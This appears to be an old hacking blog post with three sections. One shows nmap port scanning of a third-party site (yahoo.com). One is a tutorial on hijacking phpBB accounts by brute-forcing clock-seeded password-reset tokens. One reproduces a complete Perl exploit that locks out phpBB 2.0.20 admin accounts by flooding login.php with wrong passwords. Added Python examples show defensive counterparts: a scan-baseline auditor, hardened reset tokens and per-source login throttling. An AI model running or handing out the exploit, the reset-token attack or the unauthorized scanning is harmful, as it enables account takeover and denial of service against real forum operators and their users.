Monday, August 4, 2008

Find Open Ports On Web Servers :
Follow this...

Hi buddy, just follow the procedure below to find out which ports are open on a particular system.

1. Download the Nmap tool from the site www.insecure.org/nmap

2. Install it on your system.

3. Open a command prompt and change to the directory where nmap is installed.

ex: c:\nmap

4. Now type the command.

For example, if you want to know the open ports of the Yahoo server:

c:\nmap> nmap -sT -p 1-200 www.yahoo.com

In the above command, 1-200 is the range of port numbers to scan on the server; you can give any range of port numbers you want. Just try this one and see.

Sep 3 p@r@noid
netstat -n
try this command, this will give you all the IP(s) along with the port whom you are connected to..
or you may try netstat -a

SAUV : you can use other scanners also to port scan a remote PC
2. try Medusa after nmap.
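
Scanning a host you are responsible for is most useful when the result is compared against what should be open. The Python script below is an added example, not code from the post or its commenters: it parses nmap's grepable output (`nmap -sT -p 1-200 -oG - <host>`) and reports any open TCP port that is not in an expected baseline. The sample output, the host 192.0.2.10 and the baseline are constructed for the example.

```python
import re
import sys

# Constructed sample of nmap grepable output (-oG -); not a real scan result.
SAMPLE_GNMAP = """\
# Nmap 4.68 scan initiated Mon Aug  4 10:00:00 2008 as: nmap -sT -p 1-200 -oG - 192.0.2.10
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 25/filtered/tcp//smtp///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///\tIgnored State: closed (196)
# Nmap done at Mon Aug  4 10:00:05 2008 -- 1 IP address (1 host up) scanned in 5.12 seconds
"""

# Baseline (constructed): the ports each host is supposed to expose.
EXPECTED_OPEN = {"192.0.2.10": {22, 80}}

# One port entry in the "Ports:" field: port/state/protocol//service///
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)///")


def parse_gnmap(text):
    """Return {host: {(port, proto): (state, service)}} from grepable output."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # skip the "# Nmap ..." banner lines
        host = line.split()[1]
        entry = results.setdefault(host, {})
        for field in line.split("\t"):    # fields are tab separated
            if field.startswith("Ports:"):
                for port, state, proto, service in PORT_RE.findall(field):
                    entry[(int(port), proto)] = (state, service)
    return results


def unexpected_open_ports(results, expected):
    """Open TCP ports per host that are missing from the baseline."""
    findings = {}
    for host, ports in results.items():
        allowed = expected.get(host, set())
        extra = sorted(port for (port, proto), (state, _) in ports.items()
                       if proto == "tcp" and state == "open" and port not in allowed)
        if extra:
            findings[host] = extra
    return findings


if __name__ == "__main__":
    # Pipe real output in (nmap ... -oG - | python audit.py) or run on the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GNMAP
    print(unexpected_open_ports(parse_gnmap(data), EXPECTED_OPEN))
```

On the sample the only finding is port 139 (netbios-ssn), which is open but not in the baseline; the filtered port 25 is ignored because only the open state counts as exposure.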

=====================================================================================
Resetting phpBB Password :

Introduction:
In this tutorial I will be demonstrating how simple it is to get around password reset systems that are based on random numbers. Specifically, we will be looking at the very popular open source forum software phpBB. I won’t be providing fully functional applications, to avoid them getting into the wrong hands, but I will illustrate enough for anyone with some coding skills to draft their own version.

Start The Hack:
Before we start the hack there are a few things we need to get out of the way. The first is to get the server’s time. There are a number of techniques for this, but I won’t be going into them; I’ll simply assume that you already know how to do it. The second step is to make a password reset request for the account which we want to take over. Note that the email must be sent from the system that is hosting the phpBB forum. Make a note of when you make the request, as this will become crucial. The email will contain a link that performs the actual password reset, and it is this URL that we are going to try to generate with our application. An important thing to note is that the system-generated reset URL is only valid for 48 hours, so the hack has to be carried out within that period. Luckily that’s more than enough for us to successfully pull it off.

The Technique:
By this stage you should have already sent a password reset request and made a note of the time it was made. So let’s move on to how this hack is actually going to work. Essentially we’re going to generate the exact same URL that was sent in the email.

In order to do this we will need to employ the same algorithm that phpBB used to generate the address. phpBB does it by placing a random number within the URL. Of course, anyone who has done any amount of coding can tell you that such random numbers are never truly random: all you need to reproduce the same random value is the seed that was used by the random number algorithm.

Most systems use the server clock as the seed because its value is always changing and, wouldn’t you believe it, that’s exactly what phpBB does. So with this little bit of information we can generate the same seed that was used when the reset password email was created. By now you’ve probably started wondering how we’re going to know what that seed is. Well, the short and sweet of it is that we don’t. We’re going to be messy and brute force the seed. This is why we need to know the time the email was sent to within a small margin.

Implementing the Technique:
Since we’re going to be brute forcing things here we might as well be efficient and give ourselves a five minute buffer on either side of our recorded reset request time. This gives us a ten minute window around when the reset was made, which ought to be plenty. The next step is to generate every possible URL that could have been produced during that time period, with each second of the window acting as the seed. We’ll store the URLs in memory, perhaps in a linked list or an array; the choice is up to you so long as you can access the values later on. The final step is to run through each of the generated URLs to find the one that is accepted as a valid reset request.
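
The weakness the tutorial relies on is that a token drawn from a PRNG seeded with the clock is fully determined by that seed. The Python below is an added example, not the author’s code and not phpBB’s: weak_reset_token shows the seed-determinism, and issue_reset/redeem_reset show the hardened shape of a reset flow (token from the OS CSPRNG, only a hash stored server-side, expiry, single use, constant-time comparison). The 48-hour validity follows the tutorial; the function names, the in-memory dict standing in for the database and the timestamps are constructed for the example.

```python
import hashlib
import hmac
import random
import secrets

TOKEN_TTL_SECONDS = 48 * 3600   # the 48-hour validity window the tutorial mentions


def weak_reset_token(seed):
    """The pattern the tutorial attacks: a PRNG seeded with the server clock.
    Whoever knows (or can narrow down) the seed reproduces the token exactly."""
    rng = random.Random(seed)       # Mersenne Twister: deterministic per seed
    return "%016x" % rng.getrandbits(64)


def strong_reset_token():
    """Token straight from the OS CSPRNG: there is no seed to recover."""
    return secrets.token_urlsafe(32)


def issue_reset(store, user, now):
    """Create a reset token for `user`. `store` is an in-memory dict standing in
    for the database and `now` is a Unix timestamp (both constructed here)."""
    token = strong_reset_token()
    digest = hashlib.sha256(token.encode()).hexdigest()
    store[user] = (digest, now + TOKEN_TTL_SECONDS)   # persist only the hash
    return token    # only the emailed link ever carries the raw token


def redeem_reset(store, user, presented, now):
    """Accept a presented token only if it is unexpired, matches, and is unused."""
    record = store.get(user)
    if record is None:
        return False
    digest, expires = record
    if now > expires:
        del store[user]                 # expired: drop it, require a new request
        return False
    ok = hmac.compare_digest(digest, hashlib.sha256(presented.encode()).hexdigest())
    if ok:
        del store[user]                 # single use: a replayed link must not work
    return ok
```

With a time seed the token space is the width of the window in seconds; with secrets.token_urlsafe(32) it is 256 bits and there is no clock to recover, so knowing when the request was made no longer helps.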

Conclusion:

While the process may seem long and tedious, with proper automation and analysis there are a number of ways one could reduce the number of generated candidates. As for the non-coders out there, this would definitely be a good start in understanding simple concepts like loops, conditionals, efficiency and regular expressions.

=====================================================================================

PHPBB 2.0.20 Disable admin exploit :
Exploit from :- http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.txt

Here is the code :

###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
use IO::Socket;

$host = $ARGV[0];
$dirc = $ARGV[1];
$port = $ARGV[2];
$user = $ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php Host /Dir Port Admin
--------------------------------------
";
$i = 1;
if ($host ne "") {
    while ($OK ne 1) {
        my ($socket) = "";
        if ($socket = IO::Socket::INET->new(PeerAddr => $host,
                                            PeerPort => $port,
                                            Proto    => "TCP")) {
            $password = rand();
            $data = "username=" . "$user" . "&password=" . "$password" . "&redirect=&login=Connexion
";
            $length = length $data;
            print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
            read $socket, $answer, 15;
            close($socket);
        }
        if ($answer =~ /HTTP\/(.*?) 302/) { $OK = 1; }
        $i = $i + 1;
        print "$answer
";
        print "Send Packet $i ....
";
    }
}
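
The advisory's point is that a flat account lock after repeated bad logins lets anyone on the network disable the admin for 15 minutes by sending wrong passwords. The Python below is an added example of the usual mitigation, not code from the advisory or from phpBB: failures are tracked per (source, account) and met with a growing delay, so a remote party's guesses slow down that party only, while the real admin logging in from another source is unaffected. The class, the thresholds and the fake clock are constructed for the example.

```python
import time

FREE_ATTEMPTS = 3     # failures allowed before any delay kicks in (constructed policy)
BASE_DELAY = 1        # seconds; first penalty after the free attempts
MAX_DELAY = 60        # seconds; cap on the exponential back-off


class LoginThrottle:
    """Progressive back-off keyed on (source, account) instead of a hard account lock."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock              # injectable so tests can use a fake clock
        self.failures = {}              # (source, account) -> (count, not_before)

    def retry_after(self, source, account):
        """Seconds the caller must still wait before this pair may try again (0 = now)."""
        _, not_before = self.failures.get((source, account), (0, 0.0))
        return max(0.0, not_before - self.clock())

    def record_failure(self, source, account):
        """Bump the failure count; return the penalty (seconds) applied to this pair."""
        count, _ = self.failures.get((source, account), (0, 0.0))
        count += 1
        if count <= FREE_ATTEMPTS:
            penalty = 0
        else:
            penalty = min(MAX_DELAY, BASE_DELAY * 2 ** (count - FREE_ATTEMPTS - 1))
        self.failures[(source, account)] = (count, self.clock() + penalty)
        return penalty

    def record_success(self, source, account):
        """A correct password clears the history for this pair only."""
        self.failures.pop((source, account), None)


def attempt_login(throttle, source, account, password, check):
    """Gate a login attempt; `check(account, password)` is the real credential check."""
    if throttle.retry_after(source, account) > 0:
        return "throttled"          # do not even run the password check
    if check(account, password):
        throttle.record_success(source, account)
        return "ok"
    throttle.record_failure(source, account)
    return "denied"
```

Because the delay is attached to the guessing source and not to the account alone, the script above would only throttle its own connection; pairing this with a per-account alert on sustained failures keeps the defender informed without handing out a denial-of-service lever.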
